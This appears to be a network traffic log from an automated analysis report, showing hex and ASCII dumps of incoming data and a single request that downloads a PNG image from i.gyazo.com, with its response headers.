2022-01-28 16:24:58 UTC	1148	IN	Data Raw: 6d 1d 06 fa 34 76 f8 9c 4d 30 d1 85 11 74 f8 20 e8 da 1a fc 4e 3d 3e 8c bf fa 9e b9 e7 2c a0 8a a0 c3 07 41 97 36 39 ca 72 cb d8 a9 fc 11 38 26 ba 3e 82 0e 1f 04 5d 5a 87 43 ed 45 fc d7 f1 fc 80 89 ae 8e a0 c3 07 41 57 36 b9 cd 72 6f 87 d8 e9 53 76 31 be 0c 68 22 e8 f0 41 d0 95 9d 66 bd d3 58 d3 f5 6e 19 26 ba 2e 82 0e 1f 04 5d d8 61 83 81 9e d7 b1 a6 e1 9f ea 98 e8 e2 08 3a 7c 10 74 61 5f b2 de 3c 9e 72 dc e5 3e 77 26 ba 2c 82 0e 1f 04 5d d7 e5 45 d6 3b 89 27 dd 64 17 4c 74 51 04 1d 3e 08 ba ae 59 d6 7b f4 12 7a c7 9b e6 99 e8 da 08 3a 7c 10 74 59 2d 06 fa 9b 7d 1f b2 cf 99 fb 05 13 5d 12 41 87 0f 82 2e eb 20 1b f8 1e 7b cc b3 0d 26 ba 24 82 0e 1f 04 5d d5 6a 9c f5 de 8f 62 8f 69 b6 c1 44 97 44 d0 e1 83 a0 ff 66 ef 5e 96 d2 88 a2 28 0c bf 4b 46 7b 27 46 Data Ascii: m4vM0t N=>,A69r8&>]ZCEAW6roSv1h"AfXn&.]a:\|ta_<r>w&,]E;'dLtQ>Y{z:\|tY-}]A. {&$]jbiDDf^(KF{'F
2022-01-28 16:24:58 UTC	1149	IN	Data Raw: e8 18 05 41 af 82 a0 23 8a f0 f1 b1 d5 a2 cf bf 8b 89 8e 31 10 f4 2a 08 3a b2 0c 07 57 f1 de 1a 14 38 16 c7 44 47 26 82 5e 05 41 47 10 e5 21 fb da 42 1d 5d 0d 13 1d 89 08 7a 15 04 1d 49 d6 3a 03 7d b7 b1 50 bf 5d 0e 13 1d 79 08 7a 15 04 1d 31 94 07 fa d2 da 14 38 16 c7 44 47 1e 82 5e 05 41 47 08 e5 81 de fc cc 9a f2 87 95 47 5b 03 92 10 f4 2a 08 3a fe b3 77 37 29 4e 45 51 14 85 87 62 f7 1c f1 af a4 34 26 fa 4c 45 2d 11 31 a6 9e 06 2b 50 ce 7f 1c f6 c4 8e 0d 73 cf 7e ec 63 ad 6f 06 81 c0 62 c3 bd f7 95 70 6e de 1c 83 3a 1c 8b 63 a2 43 86 a0 77 41 d0 51 c1 79 a0 57 dc 59 b3 ff 88 2a 13 1d 3a 04 bd 0b 82 0e 89 6f 69 63 17 f5 ee d2 0e 13 1d 2a 04 bd 0b 82 8e 02 ce 03 3d 5f 84 c0 97 b4 c3 44 87 08 41 ef 82 a0 a3 80 f3 40 7f b7 09 81 db b4 c3 44 87 08 41 ef 82 Data Ascii: A#1:W8DG&^AG!B]zI:}P]yz18DG^AGG[:w7)NEQb4&LE-1+Ps~cobpn:cCwAQyWY:oic=_DA@DA
2022-01-28 16:24:58 UTC	1151	IN	Data Raw: 8f 60 31 d8 16 51 13 15 42 e1 fd 5f 83 0b 12 ee e8 cc 39 e5 62 ed b0 7e 8f d0 74 66 cd 3f cd f4 74 ba 9c 25 ca 2a 08 b6 c9 f4 10 52 2f 83 5e 85 41 d7 38 f4 81 be 0c 86 65 22 39 d1 d5 cf a0 57 f1 06 82 fe ce a0 bf 02 fc 40 a7 fc 4a 7c 90 4c 4e 74 75 33 e8 55 18 74 f5 f9 9d 28 eb 79 30 cc bf 27 92 13 5d dd 0c 7a 15 06 5d 63 e0 07 fa 24 28 26 c9 e4 44 57 2f 83 5e 85 41 d7 18 f4 81 7e 7c 12 14 27 d0 37 d7 0e 9d e8 ea 64 d0 ab 30 e8 ea b1 85 0d f4 69 70 4c 93 c9 89 ae 4e 06 bd 0a 83 ae 11 e8 03 7d 76 19 1c b4 5f 23 9c e8 da 93 41 af c2 a0 6b 18 be 59 ef 83 84 7a 51 39 d1 d5 c7 a0 57 41 bd f7 18 74 b4 f3 64 d9 04 c9 26 99 9c e8 ea 63 d0 ab 30 e8 6a b7 82 0d f4 bf ac 52 7d f9 96 4c ac e7 1e d5 65 d0 a1 0c ba 06 e1 07 fa 59 b0 9c 25 93 13 5d 5d 0c 7a 15 06 5d 43 Data Ascii: `1QB_9b~tf?t%*R/^A8e"9W@J\|LNtu3Ut(y0']z]c$(&DW/^A~\|'7d0ipLN}v_#AkYzQ9WAtd&c0jR}LeY%]]z]C
2022-01-28 16:24:58 UTC	1152	IN	Data Raw: 2e c2 9a e0 dd f2 5b e3 75 00 3d 08 ba 0b 82 8e 4e 47 8a 03 7d 15 de 2e 14 8f 25 30 d1 b1 0f 41 77 41 d0 d1 69 95 7a fc cf 62 2b fe d9 83 89 8e 7d 08 ba 0b 82 8e 7b 1e f7 77 bf 0c 77 eb 71 ca f2 bc c5 0e 43 20 e8 2e 08 3a ee 59 0c f4 3c 0c 7b 9f 53 d6 78 1e 40 27 82 ee 82 a0 a3 c3 5c 71 a0 bf b5 7d 8d fb 1f 37 a9 8b 89 8e 1e 04 dd 05 41 47 84 c7 5b 4a ef a2 02 b7 29 6b c2 44 47 37 82 ee 82 a0 23 3c 06 fa 79 15 a7 b6 5e a4 2e 26 3a ba 11 74 17 04 1d 7f 3b 48 41 d3 a8 c1 1b c1 2b 69 99 e8 d8 8d a0 bb 20 e8 30 39 8b 7d 1a 55 50 7c a3 6e 2d cf f9 3b 5a 1c 3a ba ce 62 4e 0e f1 ef 5e a5 34 82 3e 04 8b 81 7e 7d 19 55 38 92 fc b4 c4 44 7f 2a c7 09 b4 82 a0 3f 81 d7 92 c9 f9 12 95 50 fe 0d ce 44 df a7 a9 6f 07 80 a0 db fb 91 82 c6 d5 fc 6b 6d 91 ba 26 d5 7c 95 6d Data Ascii: .[u=NG}.%0AwAizb+}{wwqC .:Y<{Sx@'\q}7AG[J)kDG7#<y^.&:t;HA+i 09}UP\|n-;Z:bN^4>~}U8D*?PDokm&\|m
2022-01-28 16:24:58 UTC	1153	IN	Data Raw: 82 0e 0c 13 74 3a 04 1d 18 26 e8 0f f6 ea a5 84 81 20 88 02 a0 89 88 c8 c0 92 0f 71 11 03 f1 ef 24 0e fa b0 b0 30 dd af ca 44 91 43 e8 c0 60 42 27 87 d0 81 c1 84 4e 0e a1 03 83 09 9d 1c 42 07 06 13 3a 39 84 0e 0c 26 74 72 08 1d 18 4c e8 e4 10 3a 30 98 d0 c9 21 74 60 30 a1 93 43 e8 c0 60 42 27 87 d0 81 c1 84 4e 0e a1 03 83 09 9d 1c 42 07 06 13 3a 39 84 0e 0c 26 74 72 08 1d 18 ec 77 74 f4 5e 97 f9 1c 9c f7 5d 5b 13 3a c0 66 5e eb 32 cf 3b e7 3d d6 d6 84 0e b0 19 a1 6f 4a e8 00 14 84 de 85 d0 01 28 08 bd 0b a1 03 50 10 7a 17 42 07 a0 20 f4 2e 84 0e 40 41 e8 5d 08 1d 80 82 d0 bb 10 3a 00 05 a1 77 21 74 00 0a 42 ef 42 e8 00 14 84 de 45 40 e8 37 a1 03 9c 26 f4 2e 84 0e 40 41 e8 5d 08 1d 80 82 d0 bb 10 3a 00 05 a1 77 21 74 00 0a 42 ef 42 e8 f0 67 af 8e 69 00 00 Data Ascii: t:& q$0DC`B'NB:9&trL:0!t`0C`B'NB:9&trwt^][:f^2;=oJ(PzB .@A]:w!tBBE@7&.@A]:w!tBBgi
2022-01-28 16:24:58 UTC	1155	IN	Data Raw: 08 00 00 00 30 0c f2 b7 be c7 57 12 d1 21 74 e0 98 d0 e9 10 3a 70 4c e8 74 08 1d 38 26 74 3a 84 0e 1c 13 3a 1d 42 07 8e 09 9d 0e a1 03 c7 84 4e 87 d0 81 63 42 a7 43 e8 c0 31 a1 d3 21 74 e0 98 d0 e9 10 3a 70 4c e8 74 08 1d 38 26 74 3a 84 0e 1c 13 3a 1d 42 07 8e 09 9d 0e a1 03 c7 84 4e 87 d0 81 63 42 a7 43 e8 c0 31 a1 d3 21 74 e0 98 d0 e9 10 3a 70 4c e8 74 08 1d 38 26 74 3a 84 0e 1c 13 3a 1d 42 07 8e 09 9d 0e a1 03 c7 84 4e 87 d0 81 63 42 a7 43 e8 c0 31 a1 d3 21 74 e0 98 d0 e9 10 3a 70 4c e8 74 08 1d 38 26 74 3a 84 0e 1c 13 3a 1d 42 07 8e 09 9d 0e a1 03 c7 84 4e 87 d0 19 7b 75 20 00 00 00 c0 30 c8 df fa 1e 7b 49 04 61 42 e7 87 d0 81 30 a1 f3 43 e8 40 98 d0 f9 21 74 20 4c e8 fc 10 3a 10 26 74 7e 08 1d 08 13 3a 3f 84 0e 84 09 9d 1f 42 07 c2 84 ce 0f a1 03 61 Data Ascii: 0W!t:pLt8&t::BNcBC1!t:pLt8&t::BNcBC1!t:pLt8&t::BNcBC1!t:pLt8&t::BN{u 0{IaB0C@!t L:&t~:?Ba
2022-01-28 16:24:58 UTC	1156	IN	Data Raw: 53 84 0e c0 97 fd 7a 5d 49 20 0a 03 28 fa 65 d3 68 de 72 c4 bb 8e 32 28 f6 fe 6f 58 91 f4 27 a2 d0 a4 ce 71 ad 97 d8 6c 92 36 2e 23 42 d0 01 20 61 fb fe 32 42 d0 01 20 65 d3 f6 26 42 d0 01 20 61 8b de 32 22 04 1d 00 d2 35 ed 15 c3 08 41 07 80 64 cd 26 75 2b 5e 09 3a 00 24 aa 7b 78 5c 0e 23 42 d0 01 20 4d a3 e9 53 5d c5 1b 41 07 80 04 8d 9a c1 b6 f3 3e e6 82 0e 00 c9 d9 37 87 dd b1 5c 9d 52 2e e8 00 90 90 59 33 1f ec b6 75 59 6d e2 44 d0 01 e0 bf eb 2e 9a f9 78 d2 df f5 1e eb 4e 59 54 ad e7 f8 20 e8 c0 0d e8 95 3f 57 fc 95 ea b3 e2 52 eb f2 52 9d 5f d3 be 8a 87 ab 39 b6 cf d1 39 4b f9 ad 75 51 ad 5a f7 5f e7 5b d0 81 db 70 17 80 a0 03 c9 13 74 10 74 20 03 82 0e 82 0e 64 40 d0 41 d0 81 0c 08 3a 08 3a 90 01 41 07 41 07 32 20 e8 20 e8 40 06 04 1d 04 1d c8 80 Data Ascii: Sz]I (ehr2(oX'ql6.#B a2B e&B a2"5Ad&u+^:${x\#B MS]A>7\R.Y3uYmD.xNYT ?WRR_99KuQZ_[ptt d@A::AA2 @
2022-01-28 16:24:58 UTC	1157	IN	Data Raw: 07 c8 d0 6e fa bf f9 61 00 41 07 a8 df 65 5a 5f cd 06 10 74 80 fa 75 53 77 5e 10 74 80 0c ed 64 fb bf 30 ad 23 e8 00 09 4e cb 7e ef d6 3a 82 0e 10 c1 b4 8e a0 03 c4 f0 20 3c 82 0e 90 c2 5f eb 08 3a 40 0c 0f c2 ff 36 41 07 88 d2 ac fd de f6 9b 04 1d 20 cf 99 bd 3b 48 51 18 88 a2 28 0a dd e2 40 41 71 24 48 04 41 d0 ec 7f 85 22 8e 44 c4 04 1d 54 bd 7f ce 26 2e 14 79 3f e6 6d 05 09 3a 40 2a 97 63 4b 11 74 80 6c 7e ca 5a 84 a0 03 54 60 de 16 4f d0 01 ca d8 1c 96 e6 6d b1 04 1d a0 98 eb ee b4 76 39 36 8f a0 03 94 64 de 96 46 d0 01 ea 32 6f 0b 22 e8 00 d5 99 b7 45 10 74 00 cc db 02 08 3a 00 e6 6d 01 04 1d 00 f3 b6 00 82 0e 80 79 5b 00 41 07 c0 bc 2d 80 a0 03 30 61 de e6 0d be 75 82 0e c0 8c 79 9b 37 f8 56 09 3a 00 e6 6d 01 04 1d 80 f9 fe 96 17 6f f0 6d 11 74 00 Data Ascii: naAeZ_tuSw^td0#N~: <_:@6A ;HQ(@Aq$HA"DT&.y?m:@*cKtl~ZT`Omv96dF2o"Et:my[A-0auy7V:momt

Timestamp	kBytes transferred	Direction	Data
2022-01-28 16:24:59 UTC	1158	OUT	GET /83cffd1ebf23ed93aa925eb9529f5348.png HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36 Host: i.gyazo.com
2022-01-28 16:24:59 UTC	1158	IN	HTTP/1.1 200 OK Date: Fri, 28 Jan 2022 16:24:59 GMT Content-Type: image/png Content-Length: 24654 Connection: close CF-Ray: 6d4b92fc8f18921d-FRA Accept-Ranges: bytes Access-Control-Allow-Origin: https://gyazo.com Age: 283159 Cache-Control: public, max-age=31536000 ETag: "83cf" Expires: Sat, 28 Jan 2023 16:24:59 GMT Set-Cookie: Gyazo_cfwoker=i; Secure; HttpOnly; SameSite=None; Expires=Tue, 01 Jan 2030 00:00:00 GMT Vary: Accept-Encoding Via: 1.1 google CF-Cache-Status: HIT Access-Control-Allow-Credentials: true Content-Dpr: 1.000000 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" X-Cache-Level: ZS Server: cloudflare
2022-01-28 16:24:59 UTC	1159	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 07 d0 00 00 07 ac 08 03 00 00 00 d1 06 f9 f1 00 00 01 1a 50 4c 54 45 00 00 00 21 73 45 1e 71 44 1e 77 4a 21 71 44 20 72 45 21 72 45 20 72 45 21 73 46 20 72 45 20 72 45 1f 72 45 20 72 45 1f 72 44 21 75 45 1f 71 45 20 72 45 1e 73 46 20 72 45 1f 71 44 1f 73 45 20 72 45 1f 72 45 20 72 45 20 72 45 21 73 44 1e 71 46 20 71 46 1d 75 45 20 73 45 20 72 45 20 72 45 21 72 44 20 72 45 20 72 45 20 72 45 20 71 45 20 72 45 20 71 45 23 72 48 20 72 45 ff ff ff 88 b4 9c 71 a5 89 a6 c7 b5 6a a1 83 c2 d8 cc 34 7f 56 d6 e5 dd f0 f6 f3 3e 85 5e ae cc bb 79 aa 8f 5b 98 77 97 bd a8 fd fe fe 24 75 48 29 78 4c 21 73 46 fa fc fb f6 f9 f8 2e 7b 51 eb f2 ee 7f ae 94 a0 c3 b0 bc d5 c7 da e8 e0 cc df d5 37 80 58 e2 ed e7 8e b8 a1 46 Data Ascii: PNGIHDRPLTE!sEqDwJ!qD rE!rE rE!sF rE rErE rErD!uEqE rEsF rEqDsE rErE rE rE!sDqF qFuE sE rE rE!rD rE rE rE qE rE qE#rH rEqj4V>^y[w$uH)xL!sF.{Q7XF
2022-01-28 16:24:59 UTC	1160	IN	Data Raw: 05 1d 80 82 35 e1 bf 54 11 74 00 42 ab 76 f0 4d d0 01 08 a2 aa 2f 55 7e d8 bb 63 14 04 82 20 88 a2 99 88 c2 82 e9 62 28 e8 fd 4f 28 82 81 a8 c8 ac 51 77 cd 7b 97 f8 b0 cd d4 0a 3a 00 79 0c be 09 3a 00 ad 19 7c 13 74 00 7a 3b 1b 7c 13 74 00 3a 33 f8 26 e8 00 b4 b6 ac 06 df 04 1d 80 c6 0c be 3d 09 3a 00 4d 19 7c 7b 25 e8 00 b4 63 f0 ed 93 a0 03 d0 c8 b2 ee 7c 61 ff 4a d0 01 e8 c1 e0 db 4f 82 0e 40 75 06 df 06 08 3a 00 75 3d be b0 1b 7c 1b 22 e8 00 94 64 f0 6d 1b 41 07 a0 18 83 6f 25 08 3a 00 ff ba 9e f6 c7 cb e1 46 05 82 0e 80 c1 b7 00 82 0e c0 f6 e7 68 be b0 97 23 e8 00 78 8e 16 40 d0 01 18 fa 3b 9a e7 68 b5 09 3a 00 8e e5 01 04 1d 00 db ad 01 04 1d 00 c7 f2 00 82 0e c0 db b1 dc 8f 4e 3b 12 74 00 1c cb 03 08 3a c0 f4 1c cb 13 08 3a c0 c4 1c cb 73 08 3a c0 Data Ascii: 5TtBvM/U~c b(O(Qw{:y:\|tz;\|t:3&=:M\|{%c\|aJO@u:u=\|"dmAo%:Fh#x@;h:N;t::s:
2022-01-28 16:24:59 UTC	1161	IN	Data Raw: 8d e5 7e 12 03 8c 87 a0 c3 6e aa 76 e2 dd 1b 30 3e 77 d3 63 31 8b 63 ba 97 7a 2f d9 b7 f2 a1 49 39 74 57 0c 9d 0f dd 2f 87 16 f3 a1 66 e8 79 f5 89 a6 99 cf 1f 96 57 e7 17 45 51 96 79 7e 9b 65 75 dd f6 5f be 3a fb 4f de bd 01 c0 81 3c 5d 6e 6f 56 cd cb 62 79 7f 51 94 93 7c dd 6e 0e 17 f9 8e 37 f6 ea 04 b5 41 28 0a 00 20 a8 b8 14 97 9f 36 5a ab 21 22 92 f6 fe 37 ec 2d 02 ef 33 73 89 01 80 b7 59 ce ef e1 ab 6b f7 ad 14 3a 00 64 60 99 5f cf b6 2a 46 a1 03 40 7c d7 dc 37 fb 43 e8 00 90 81 8f fb 73 2f 85 0e 00 19 38 a7 76 13 3a 00 64 60 3d ea 3f a1 03 40 7c e9 b3 b9 09 1d 00 32 70 76 85 d0 01 20 03 73 f3 10 3a 00 c4 97 86 7a 14 3a 00 c4 b7 76 a5 d0 01 20 be 6b da 84 0e 00 f1 a5 e1 47 e8 00 90 81 fb 4d e8 00 10 5f ea 0b a1 03 40 7c d7 54 08 1d 00 e2 5b ba 51 e8 Data Ascii: ~nv0>wc1cz/I9tW/fyWEQy~eu_:O<]noVbyQ\|n7A( 6Z!"7-3sYk:d`_*F@\|7Cs/8v:d`=?@\|2pv s:z:v kGM_@\|T[Q
2022-01-28 16:24:59 UTC	1162	IN	Data Raw: 38 26 74 3a 84 0e 1c 13 3a 1d 42 07 8e 09 9d 0e a1 03 c7 84 4e 87 d0 81 63 42 a7 43 e8 c0 31 a1 d3 21 74 e0 98 d0 e9 10 3a 70 4c e8 74 08 1d 38 26 74 3a 84 0e 1c 13 3a 1d 42 07 8e 09 9d 0e a1 03 c7 84 4e 87 d0 81 63 42 a7 43 e8 c0 31 a1 d3 21 74 e0 98 d0 e9 10 3a 70 4c e8 74 08 1d 38 26 74 3a 84 0e 1c 13 3a 1d 42 07 8e 09 9d 0e a1 03 c7 84 4e 87 d0 81 63 42 a7 43 e8 c0 31 a1 d3 21 74 e0 98 d0 e9 10 3a 70 4c e8 74 08 1d 38 26 74 3a 84 0e 1c 13 3a 1d 42 07 8e 09 9d 0e a1 03 c7 84 4e 87 d0 c7 5e 1d d4 20 10 04 41 00 b4 c3 f1 00 14 60 80 84 17 fe b5 e0 60 1f 97 5c b2 d3 5d 65 a2 80 60 42 a7 87 d0 81 60 42 a7 87 d0 81 60 42 a7 87 d0 81 60 42 a7 87 d0 81 60 42 a7 87 d0 81 60 42 a7 87 d0 81 60 42 a7 87 d0 81 60 42 a7 87 d0 81 60 42 a7 87 d0 81 60 42 a7 87 d0 81 Data Ascii: 8&t::BNcBC1!t:pLt8&t::BNcBC1!t:pLt8&t::BNcBC1!t:pLt8&t::BN^ A``\]e`B`B`B`B`B`B`B`B`B`B
2022-01-28 16:24:59 UTC	1164	IN	Data Raw: 21 74 00 82 d0 57 08 1d 80 20 f4 15 42 07 20 08 7d 85 d0 01 08 42 5f 21 74 00 82 d0 57 08 1d 80 20 f4 15 42 07 20 08 7d c5 0d 42 7f 17 3a 40 68 42 5f 21 74 00 82 d0 57 08 1d 80 20 f4 15 42 07 78 96 9f c7 a2 ef 2b b5 f6 fb a0 b4 bf eb a5 09 1d 38 d8 d7 05 77 21 74 e0 60 42 e7 3e 84 0e 1c 4c e8 dc 87 d0 f9 67 af 8e 89 00 04 02 20 88 29 a0 43 02 fe 35 62 e2 8b 9f db c4 44 60 98 d0 e9 10 3a 30 4c e8 74 08 1d 18 26 74 3a 84 0e 0c 13 3a 1d 42 07 86 09 9d 8e 13 a1 7f 42 07 ee 24 74 3a 84 0e 0c 13 3a 1d 42 07 86 09 9d 0e a1 03 c3 84 4e 87 d0 81 61 42 a7 43 e8 c0 30 a1 d3 21 74 60 98 d0 e9 10 3a 30 4c e8 74 08 1d 18 26 74 3a 84 0e 0c 13 3a 1d 27 42 7f 85 0e dc 49 e8 74 08 1d 18 26 74 3a 84 0e 0c 13 3a 1d 42 07 86 09 9d 0e a1 03 c3 84 4e 87 d0 81 61 42 a7 43 e8 c0 Data Ascii: !tW B }B_!tW B }B:@hB_!tW Bx+8w!t`B>Lg )C5bD`:0Lt&t::BB$t::BNaBC0!t`:0Lt&t::'BIt&t::BNaBC
2022-01-28 16:24:59 UTC	1165	IN	Data Raw: a0 23 30 82 de 38 c5 9d dd 95 ab e4 98 e0 ed 81 fe 51 42 7e 04 1d 81 11 f4 c6 29 7e a1 d4 fb 86 96 ce 89 c9 29 64 85 9d 3b 04 1d 71 10 f4 c6 5d ce 4c 93 e3 0d 2d 23 93 d3 9f 26 34 61 d1 f2 68 68 d9 2c 5b d8 9f e0 ed 19 82 ae 45 f1 c6 b4 ef 0d 2d 8a 6b ec 5c ff 82 81 ba 1d 5b 36 fc f4 f3 37 bc 0c 31 13 74 19 8a ef 87 7d 6f 68 11 1c 34 ec 71 40 c7 76 04 dd 0b 82 8e 5d 3e 9a 26 b7 f7 a6 05 ef ac 71 40 c7 1f 10 74 2f 08 3a 76 39 12 fc ec b8 e7 0d 2d 82 77 d6 7a 6e df 76 a0 0e 04 fd 07 7b f7 9a d3 54 18 45 61 78 10 4e 62 6f 85 a8 51 2c 2d 82 5a 84 42 81 00 2a c8 ad f3 9f 06 9c fe a5 fd ce 2e 09 cd 5a e1 7d 86 40 a0 2f 5f cf 65 b9 20 e8 78 c6 61 18 ac b3 15 96 7e a6 9c 8d 00 96 23 e8 2e 08 3a 7a 9d e9 1d 29 e7 ae c2 d1 50 6f 93 76 70 16 c0 72 04 dd 05 41 c7 33 Data Ascii: #08QB~)~)d;q]L-#&4ahh,[E-k\[671t}oh4q@v]>&q@t/:v9-wznv{TEaxNboQ,-ZB*.Z}@/_e xa~#.:z)PovprA3
2022-01-28 16:24:59 UTC	1166	IN	Data Raw: be 25 ce 04 33 4d ec 28 59 3e 87 84 ff 6e 1b f4 06 06 5d 7b c0 1f 9c 32 b8 0e 86 6d b2 70 1e 5d a8 3c 83 0e 65 d0 b5 87 e9 55 e2 7c 85 2c 8b 5b 27 8b 37 e8 ea 65 d0 ab 30 e8 da c7 2a 79 9e 82 80 b6 4b ff 31 a4 4e 06 bd 0a 83 ae 7d cc 68 2b b9 31 c7 a7 5c 24 cb 36 a4 4e 06 fd 2f 7b 77 80 d3 36 10 45 51 74 01 dd c8 1b 40 6a 83 2a 1a 9b 24 54 a0 42 05 34 b4 69 04 aa 68 f6 bf 0d bc 02 a4 cc 8c 3d ef 9b 7b 96 60 25 be 9a c4 df 3f 0a 82 8e 22 b7 c9 ce a5 c3 2d a1 7b 4a 56 bc de 89 8b e0 08 ba 29 82 8e 22 6b c3 15 2d 3b b5 e7 f6 5f 84 c7 ff 10 98 09 82 6e 8a a0 e3 28 f6 3f 2d 0f f6 bd 5a eb f7 c9 ca 63 fb 4b 82 19 21 e8 a6 08 3a ca fc 35 7b 61 b9 c7 03 dd 0f c9 cb 83 80 6c 04 3d 0a 82 8e e3 d8 af 14 1b fc d3 c4 dc bf 57 5f 38 a0 a3 00 41 8f c2 ec c6 43 d0 e3 79 Data Ascii: %3M(Y>n]{2mp]<eU\|,['7e0yK1N}h+1\$6N/{w6EQt@j$TB4ih={`%?"-{JV)"k-;_n(?-ZcK!:5{al=W_8ACy
2022-01-28 16:24:59 UTC	1168	IN	Data Raw: 41 87 4b f8 16 55 c7 55 f4 e8 67 dc 0f 05 94 20 e8 ff d8 bb c3 9c 26 02 20 0c c3 37 f1 f7 37 88 41 23 9a 76 69 45 43 21 da d8 ad 18 09 8a de ff 1c 7a 03 59 3a b3 7c 03 ef 73 03 7e c0 9b 59 66 77 ba 78 06 41 7f 41 d0 e7 e1 7e 45 f5 4a e9 16 46 0f 21 18 d0 51 85 a0 77 41 d0 91 c6 fc 8a 6a c2 ab e8 ce 9b fc 2f 05 d4 20 e8 5d 10 74 d4 d9 38 7d 74 25 e1 70 89 f3 e7 f0 2e 17 02 6a 10 f4 2e 08 3a f2 98 5f 51 7d ab 64 bf c3 c7 ad 80 22 04 bd 0b 82 8e 3c e6 57 54 57 6b e5 3a 0e 1b 5b 06 74 94 21 e8 5d 10 74 24 32 bf a2 7a ab 54 cb 7d d8 38 15 50 85 a0 77 41 d0 51 e9 4b 38 b9 d0 21 9c bf 9c c3 80 8e 42 04 bd 0b 82 8e 4c ce 6b 63 ff ec 94 c9 e8 fc cc b9 80 32 04 bd 0b 82 8e 4c d6 df 3a 8f 18 95 e8 2e 6c 7c 58 0a 28 43 d0 bb 20 e8 28 35 bc 0e 23 a9 4f a6 6f c2 06 03 Data Ascii: AKUUg & 77A#viEC!zY:\|s~YfwxAA~EJF!QwAj/ ]t8}t%p.j.:_Q}d"<WTWk:[t!]t$2zT}8PwAQK8!BLkc2L:.l\|X(C (5#Oo
2022-01-28 16:24:59 UTC	1169	IN	Data Raw: 08 3a ea 20 e8 be 34 0e 76 67 ee be 95 67 65 40 77 44 d0 51 07 41 f7 75 9a 1a 3e c4 32 d1 43 e8 0c e8 8e 08 3a ea 20 e8 c6 fe a4 84 2f 1f 63 89 e6 c5 76 c7 0c e8 8e 08 3a ea 20 e8 c6 3e a7 86 49 2c d1 fc e8 b1 17 30 44 d0 51 07 41 77 a6 71 59 cb e6 05 66 17 0a bf df 63 40 f7 44 d0 51 07 41 77 76 9d 12 0e 4e e2 25 c9 7b 6a af 03 8e 08 3a ea 20 e8 ce 86 97 29 61 12 eb 29 2c 7b bd 1c 06 1c 11 74 d4 41 d0 ad 69 6c 3c c9 69 ac 75 95 02 76 03 96 08 3a ea 20 e8 d6 46 12 17 b0 e5 c1 45 3c 23 79 ed eb 77 06 74 53 04 1d 75 10 74 6f b3 94 b0 88 35 0e 15 76 b7 ff 0d 78 22 e8 a8 83 a0 7b 1b 9f a7 82 69 3c 91 3c 5d c7 80 6e 8b a0 a3 8e d7 08 fa 3b 82 ae 4b e1 75 f6 86 77 ee ff b2 7f 0c e8 b6 08 3a ea 20 e8 e6 4e 24 2e 55 cd 45 74 1a 09 bc 44 60 40 f7 45 d0 51 07 41 77 Data Ascii: : 4vgge@wDQAu>2C: /cv: >I,0DQAwqYfc@DQAwvN%{j: )a),{tAil<iuv: FE<#ywtSuto5vx"{i<<]n;Kuw: N$.UEtD`@EQAw
2022-01-28 16:24:59 UTC	1170	IN	Data Raw: df 35 84 81 4e 2b 82 1e 4a d0 c9 75 5f 33 ec 2f e8 44 d0 43 09 3a b9 a6 dc 7f 3d 5b d0 89 a0 87 12 74 82 fd ac 09 0c 74 9a 11 f4 50 82 4e b0 af 23 ee bf 1a e8 34 23 e8 a1 04 9d 64 13 ee bf 1a e8 74 23 e8 a1 04 9d 64 07 03 ee bf 1a e8 74 23 e8 a1 04 9d 68 1f 6a eb 0c 74 da 11 f4 50 82 4e b4 ff 9b bf ff 6a a0 d3 8e a0 87 12 74 b2 9d d6 b6 dd 2c e8 46 d0 43 09 3a d9 ce 6a db 6e 17 74 23 e8 a1 04 9d 70 db be ff 6a a0 d3 90 a0 87 12 74 c2 ed d5 96 19 e8 34 24 e8 a1 04 9d 70 0f ec dc 51 2a 2d 60 18 85 e1 eb 33 93 ff 3f 52 28 b5 29 12 71 c1 e6 4a 91 98 ff 34 4c 63 ad cf f3 4c e2 6d dd ac c3 e3 9e eb 61 41 1f 41 0f 25 e8 a4 9b fc ff 6a a0 d3 48 d0 43 09 3a e9 ae ce f7 54 06 3a 95 04 3d 94 a0 13 ef 6d 4f 75 b9 a0 90 a0 87 12 74 e2 8d fd 7f 35 d0 e9 24 e8 a1 04 9d Data Ascii: 5N+Ju_3/DC:=[ttPN#4#dt#dt#hjtPNjt,FC:jnt#pjt4$pQ*-`3?R()qJ4LcLmaAA%jHC:T:=mOut5$
2022-01-28 16:24:59 UTC	1172	IN	Data Raw: 7e 52 5f 63 67 41 24 41 6f aa f9 35 29 e8 3c fa 5d f3 6c 0e 17 24 12 f4 a6 04 9d 08 3f 6a 20 13 9d 4c 82 de 94 a0 93 e0 6f 4d f4 c5 44 e7 81 fd 3a 4d 8d 02 0a a2 30 ba 13 7f bf 42 82 11 22 76 da 91 c4 b1 e3 18 e3 04 71 ff db 70 1b b7 5e 9d b3 86 a2 3e 6e 4b 82 1e 4a d0 69 e0 78 5e 5b ba 5d d0 90 a0 87 12 74 1a b8 af 3d 99 e8 b4 24 e8 a1 04 9d 7c 87 bb da 94 89 4e 47 82 1e 4a d0 c9 77 51 bb 32 d1 e9 48 d0 43 09 3a f1 2e 4f b5 ad 57 0b da 11 f4 50 82 4e bc db da d7 c9 44 a7 1f 41 0f 25 e8 a4 bb 7c 59 1b 33 d1 e9 47 d0 43 09 3a e9 de d5 ce 4e 87 05 cd 08 7a 28 41 27 dc 8b c7 b5 b5 8b 05 cd 08 7a 28 41 27 dc 97 da 9b 89 4e 3b 82 1e 4a d0 c9 f6 e8 6b 6d ce 44 a7 1b 41 0f 25 e8 64 fb 5e bb 7b 6b a2 d3 8c a0 87 12 74 a2 bd 79 5e db fb bd a0 15 41 0f 25 e8 44 7b Data Ascii: ~R_cgA$Ao5)<]l$?j LoMD:M0B"vqp^>nKJix^[]t=$\|NGJwQ2HC:.OWPNDA%\|Y3GC:Nz(A'z(A'N;JkmDA%d^{kty^A%D{
